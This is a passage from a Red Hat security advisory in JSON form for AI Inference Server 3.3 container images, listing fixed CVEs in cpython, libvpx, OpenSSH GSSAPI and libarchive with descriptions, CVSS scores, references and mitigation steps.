"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1299"
},
{
"category": "external",
"summary": "RHBZ#2432437",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2432437"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1299",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1299",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1299"
},
{
"category": "external",
"summary": "https://cve.org/CVERecord?id=CVE-2024-6923",
"url": "https://cve.org/CVERecord?id=CVE-2024-6923"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/commit/052e55e7d44718fe46cbba0ca995cb8fcc359413",
"url": "https://github.com/python/cpython/commit/052e55e7d44718fe46cbba0ca995cb8fcc359413"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/144125",
"url": "https://github.com/python/cpython/issues/144125"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/144126",
"url": "https://github.com/python/cpython/pull/144126"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/6ZZULGALJTITEAGEXLDJE2C6FORDXPBT/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6ZZULGALJTITEAGEXLDJE2C6FORDXPBT/"
}
],
"release_date": "2026-01-23T16:27:13.346000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications accepting user-supplied data for email headers should sanitize the input by stripping or rejecting any strings containing carriage return or line feed characters, \u0027\\r\u0027 or \u0027\\n\u0027, respectively, preventing malicious sequences that could lead to header manipulation.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cpython: email header injection due to unquoted newlines"
},
{
"cve": "CVE-2026-2447",
"discovery_date": "2026-02-16T15:01:25.122593+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2440219"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Firefox and Thunderbird. The Mozilla Foundation\u0027s Security Advisory describes the following issue: Heap buffer overflow in libvpx.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libvpx: Heap buffer overflow in libvpx",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security rates the severity of this flaw as determined by the Mozilla Foundation Security Advisory.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2447"
},
{
"category": "external",
"summary": "RHBZ#2440219",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440219"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2447",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2447"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2447",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2447"
},
{
"category": "external",
"summary": "https://bugzilla.mozilla.org/show_bug.cgi?id=2014390",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2014390"
},
{
"category": "external",
"summary": "https://www.mozilla.org/security/advisories/mfsa2026-10/",
"url": "https://www.mozilla.org/security/advisories/mfsa2026-10/"
}
],
"release_date": "2026-02-16T14:13:23.559000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libvpx: Heap buffer overflow in libvpx"
},
{
"cve": "CVE-2026-3497",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-03-12T19:01:37.007806+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447085"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This vulnerability affects the OpenSSH GSSAPI delta as implemented in Red Hat Enterprise Linux and OpenShift Container Platform. An unauthenticated attacker could send a specially crafted GSSAPI message during key exchange, leading to the use of uninitialized variables and potentially undefined behavior. The severity of the impact is dependent on compiler hardening configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "RHBZ#2447085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://ubuntu.com/security/CVE-2026-3497",
"url": "https://ubuntu.com/security/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2026/03/12/3",
"url": "https://www.openwall.com/lists/oss-security/2026/03/12/3"
}
],
"release_date": "2026-03-12T18:27:44.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable GSSAPI key exchange in the OpenSSH server configuration. This prevents the server from processing GSSAPI messages, eliminating the vulnerability\u0027s attack surface.\n\nEdit `/etc/ssh/sshd_config` and add or modify the line:\n```\nGSSAPIKeyExchange no\n```\n\nAfter saving the changes, restart the `sshd` service for the mitigation to take effect. This action will prevent users from authenticating via GSSAPI.\n\n```\n# systemctl restart sshd\n```",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4111",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-11T11:18:51.609000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446453"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team would likely assess the severity of this vulnerability as High because it allows remote attackers to cause a persistent denial-of-service condition using a small crafted archive file. Successful exploitation requires no authentication, no special configuration, and no user interaction in environments that automatically process uploaded archives. By repeatedly submitting malicious archives, an attacker can exhaust CPU resources or worker threads in services such as file upload systems, CI/CD pipelines, mail scanners, and content indexing services that rely on libarchive for archive extraction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "RHBZ#2446453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446453"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4111"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2877",
"url": "https://github.com/libarchive/libarchive/pull/2877"
}
],
"release_date": "2026-03-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4424",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-03-19T12:22:21.740000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449006"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This heap out-of-bounds read vulnerability in libarchive\u0027s RAR archive processing logic can lead to information disclosure. A remote attacker can exploit this flaw by providing a specially crafted RAR archive, potentially revealing sensitive heap memory information without requiring authentication or user interaction on systems that process untrusted archives.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "RHBZ#2449006",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449006"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4424",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2898",
"url": "https://github.com/libarchive/libarchive/pull/2898"
}
],
"release_date": "2026-03-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libarchive: libarchive: Information disclosure via heap out-of-bounds read in RAR archive processing"
},
{
"cve": "CVE-2026-4519",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-03-20T16:02:13.494105+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449649"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "RHBZ#2449649",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4519"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143930",
"url": "https://github.com/python/cpython/issues/143930"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/143931",
"url": "https://github.com/python/cpython/pull/143931"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/"
}
],
